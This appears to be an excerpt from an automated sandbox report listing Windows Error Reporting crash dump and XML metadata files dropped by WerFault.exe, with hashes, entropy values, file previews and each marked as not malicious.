                                                                                                                                                                                                                  Entropy (8bit):3.713533511256963
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJnR76B6Y2DSSU9wPgmf+KLprN89b1bsfJnm:R6lXJd6B6YfSU9ggmf981gfk
                                                                                                                                                                                                                  MD5:1EC16D573D584E64FDDAD1B053C4BB45
                                                                                                                                                                                                                  SHA1:92343E76E6E29A334796A5B39F68CAFD4FF080BC
                                                                                                                                                                                                                  SHA-256:845AE2E4BFF58341CCB6F08FAFEE1B1B8AEA53D4C693CC6646B843D23AAF747E
                                                                                                                                                                                                                  SHA-512:D447D82794B77C2BD45F8A071F2AF2CE1D4D5CDBC6F61415AF057E253B0A29CF37020E7EC2EC3FCB695355E8974F7D4A21FE4498B1911CCEFEBFADFC5422FF35
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.2.8.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER227A.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5997900855427005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VY5Ym8M4Jw1GFN+q8rgmFMTmTd:uIjfZI77P7VJJwc3mmTmTd
                                                                                                                                                                                                                  MD5:57D8493C29FBEE1A027EB81C2DD93C5C
                                                                                                                                                                                                                  SHA1:7FF4A13EAA76FD3187151BE3C3859B167BDA0825
                                                                                                                                                                                                                  SHA-256:FCD75C5E01B339E6C0F6B7575FB7AAE8DD8BED9B3E09C07B9F4CDB411ACBB05E
                                                                                                                                                                                                                  SHA-512:8A7FE00DDC50B624504967AD7DAD5C3A71154999FAE6678BCBE66ABD80D0A94608061D7E9F67A0813B801765E71C1BFA086C537FB7BA9B671E8BBB6EC203E1F3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER23C0.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:12 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):989064
                                                                                                                                                                                                                  Entropy (8bit):1.7444958992026331
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:P0pondkzR197SzVywRtWCm/CecHvQvWJrdP:baW1DmKd
                                                                                                                                                                                                                  MD5:D53100BA982E7E7070014AF8BDF56916
                                                                                                                                                                                                                  SHA1:9BFFB51EBEE9BE38AA50502C521CF8DEA22292BE
                                                                                                                                                                                                                  SHA-256:BC36F7EEB2DB7B761AE3EC186BF13C6E2A32A10CC9C85B46BC0A673CD679BAF7
                                                                                                                                                                                                                  SHA-512:25941FC8DA0DA251E2B5CBFE8777113C60ADD83435E7543345F4D72F0C31433D37698C3084BA9067DF77AED3D9752B29F1D3BD30F053BC5A89031D9D91408A6C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g.....................................2...h..........T.......8...........T...........Pt..8............1...........3..............................................................................eJ......l4......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BA1.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                  Entropy (8bit):3.7146632981954673
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ7Ry68C6Y2DDSU9QPgmf+KLprG89be4sfMKm:R6lXJY656Y+SU9Agmf9Jerfw
                                                                                                                                                                                                                  MD5:AE604829EE46A75898AEB771EE5E6F21
                                                                                                                                                                                                                  SHA1:D0FD9B8B84CACDCBDD484F4214F342582A7165FA
                                                                                                                                                                                                                  SHA-256:94F8DFB30E8E0715C93A6CF2EC73C57D7300397BAA11B37531F7DAD38503746E
                                                                                                                                                                                                                  SHA-512:676EEDF487E61CE2A0738DF07FD72F42A0DAD1973736C3C5CE557B2106B613CB2B3643D69452B4B656B0A31D53F4A2C0BE9F8595D2253B2CAB5402966E3E79D8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.2.8.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C5D.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5998148993873285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYwYm8M4Jw1GFac+q8rsFMTmId:uIjfZI77P7VwJwpclmTmId
                                                                                                                                                                                                                  MD5:FCD931B77C7F3A873472BF8A01C12CFF
                                                                                                                                                                                                                  SHA1:4368829BC33952D086EE499EB4A33FC9FA1F302B
                                                                                                                                                                                                                  SHA-256:BF8433783E7B5EA7AB5A9D28772B22A8BEF972BFDBFD9164E3D39F41401137E9
                                                                                                                                                                                                                  SHA-512:18DAF9013786EB1C7742C6AE1CB3E1CA82C020F645CDFF665C025F298CD384F2007762D188A02C8B91E46C6EF920523200031A5F9A4C38E41B8E59CD0596A91E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CA9.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:13 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):681966
                                                                                                                                                                                                                  Entropy (8bit):1.5435921840714184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:oUBpe2tnG1T2BmUiiQr3jCbZzRdSXn7tW1bbTGO2:lpekmUF+can7t0p2
                                                                                                                                                                                                                  MD5:228AE854B8ABB21CB4DC191A175DAE81
                                                                                                                                                                                                                  SHA1:ACD219B8DC88A6C14B8D4D4D1C16E4F0F1418F92
                                                                                                                                                                                                                  SHA-256:9BA94E8AE303F1F4914CA917071762BD02A74BB4C4E8686495508CA25F9F24B3
                                                                                                                                                                                                                  SHA-512:FCEF89D9AD1F608DF505EFB8EC7294086FD00CDC9694C9495D0A47FE7D421C1DC165882953B27CC4AF29E831569F827DD655F1133C17D7253564D969AD8A2080
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g............4...............<...........:...........T.......8...........T............r...............-..........................................................................................eJ......./......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F98.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.714513340283139
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJaRt6sdo6Y2D7SU9QPgmf+KLprx89bRgsfqbm:R6lXJO6B6YmSU9Agmf94Rzf/
                                                                                                                                                                                                                  MD5:75650C223E376AAECEA1CBD2A507F630
                                                                                                                                                                                                                  SHA1:DCCB2BEF728751D29A528CF2B718CC141E307B5C
                                                                                                                                                                                                                  SHA-256:8EF9324B86A076E9B4F5CCBA02395E79E7D02A01F03C324F122FECED45AA980D
                                                                                                                                                                                                                  SHA-512:7C082D893E14482A7C1074F3DF450234C41C507F2CA006C080D70EAD2EE26CF08A6C9C4E50A4512063A58F6B410671ECA8CDBEC4E3E2AA187C48E21736FE7001
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.4.8.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FD8.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5997879873341425
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYtYm8M4Jw1GFhWI+q8rIFMTm5d:uIjfZI77P7V5Jwyr9mTm5d
                                                                                                                                                                                                                  MD5:838D55479CA2382BC961CECCCE4B32F7
                                                                                                                                                                                                                  SHA1:6B60BD64A99885861C8593624A85BAF557E89D9D
                                                                                                                                                                                                                  SHA-256:0192AFCD7725FC8F505EDE3570D9A890E24BF32F1AC90E3C82D939CC10167A29
                                                                                                                                                                                                                  SHA-512:B19D3116CEA45A2BB2B937F52978E5303E935823BF2A117E89338F1AA1019B0B6806FEAF90724690E66CBA6E5179B834FDF14AA8FE1F0CFAF2597E5BF0F48C93
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER363E.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:15 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):880128
                                                                                                                                                                                                                  Entropy (8bit):1.6737603273180888
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:nyvVjSx6L1ghXDacLijIHDFbj6l2rAuW1hq7jxwVA:nytjSs6acLWwbf8o3F
                                                                                                                                                                                                                  MD5:29EDDBC36086A47A2E7541AA3D48F440
                                                                                                                                                                                                                  SHA1:CD4A873F7F41D569F4D2377F1B09E31DF9F30175
                                                                                                                                                                                                                  SHA-256:4E8397105F7E1F2494BD58DFE330BCDC5C35F816EF5F55317D9E02F4C4BDFB7E
                                                                                                                                                                                                                  SHA-512:658ABB8A5A38F12A60886E5AA74A1F66B7F74D047AFBEE59A7EEBD9300F34C62FDBC4331D3B15F49F7509A3071E2AECD20D2BA9A1B99330B7CFAA3224608C1CD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g....................................4(...P..........T.......8...........T............g..0...........h0..........T2..............................................................................eJ.......2......GenuineIntel............T.......X....C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A47.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.7152854258299772
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJNRK656Y2DUSU9asgmf+KLprl89bDssfcBm:R6lXJ2656YpSU9Rgmf9UD/fX
                                                                                                                                                                                                                  MD5:F3A116609F63795329871C64DDDF4A7D
                                                                                                                                                                                                                  SHA1:66C2C3E5B50E7355CC1CAA2F691409D5B2A6B431
                                                                                                                                                                                                                  SHA-256:C41082567074FD749BB4DDFF350CBE482941594CB89F4A4DF9659F1C0B6C14C5
                                                                                                                                                                                                                  SHA-512:6E1DA4601DCD56EF0BE0760434CF36806F20466AC2BE635AF13B60DF756066210A44457AC519DD8DC4B1A617B6E96AFBED3E52CF83EE49F71086FFDF6E5689F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.1.6.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A96.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.602722257506383
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYtYm8M4Jw1GF5lT+q8r0iHFMTmed:uIjfZI77P7VNJwu9iHmTmed
                                                                                                                                                                                                                  MD5:3E47E9111C812BB55BDD438343353681
                                                                                                                                                                                                                  SHA1:ADFF5A057707A0610DE8F78BEEA8583AAE439D50
                                                                                                                                                                                                                  SHA-256:036EBE52419870196D9F80CF9AED5C76DFF1CA9AA60DD52338B0E29F64A3A38B
                                                                                                                                                                                                                  SHA-512:117315B0E1631251AEC053853C6D412D5B1CBC3F80705E9B1953E48BB42B7D64A61033CFC2E5439888E818A399B7CFDC719160083A7D8C71B706E2E69FD2BF29
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER40AE.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:18 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1054918
                                                                                                                                                                                                                  Entropy (8bit):1.72845446287247
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:3kKLVqFCPRmm0sBwIedS4b2dMXlQ/1dsIEUxdNQdJD9w/qKkpDmbfcSZEbuPGz5O:UKZ51heHdSKHVQEIpdNgZ9ykGEKZ
                                                                                                                                                                                                                  MD5:6D32D06AF8B50D5E657D0239F658BAB5
                                                                                                                                                                                                                  SHA1:872BF9B251E40812277082EECB2E7D6618C49853
                                                                                                                                                                                                                  SHA-256:421234DB54E73344310963D8832841119345A320BD3F2049D34E0EE19908A302
                                                                                                                                                                                                                  SHA-512:9D6E08FD078D8313BC9C0C9D269DB2F040313EE25517ED2BC35FE8CD65F526806952FB2EEE72475053813B8280CCFDBDF918612C313EE79C02F1F538AFD9EBAE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g....................................43...t..........T.......8...........T................s...........2...........4..............................................................................eJ......,5......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4524.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8446
                                                                                                                                                                                                                  Entropy (8bit):3.715225088252287
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJPR26PBrR6Y2DZSU9vgmf+KLprQ89b0SCsf08m:R6lXJY6JrR6YUSU9vgmf970SBfG
                                                                                                                                                                                                                  MD5:7C33C2C513663DB0D836D17C85FE624D
                                                                                                                                                                                                                  SHA1:C76090550C1E1600F0FD5F655C611CBFB8BFF18A
                                                                                                                                                                                                                  SHA-256:5EFB5F7C5E70E51520CC52E7CC7FBC8A928BBEDCF475A902FC58A4819532E9BD
                                                                                                                                                                                                                  SHA-512:7FA229AEE13D0E9DAC119CADD2B2CD98825BEC5FB380E3BA04A5C004900340AABB71E6FF1961A976A755BEB44ACBBC002ABDA17B8D4100769656E302E5C8F66B
                                                                                                                                                                                                                  Malicious:false
